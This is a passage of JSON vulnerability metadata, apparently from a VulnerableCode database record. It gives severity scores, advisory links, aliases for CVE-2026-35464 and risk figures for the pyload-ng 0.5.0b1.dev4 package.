I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","sc
oring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"}],"fixed_packages":[],"aliases":["CVE-2026-35464","GHSA-4744-96p5-mp2j"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xmf5-aqjt-tfhp"}],"fixing_vulnerabilities":[],"risk_score":"10.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b1.dev4"}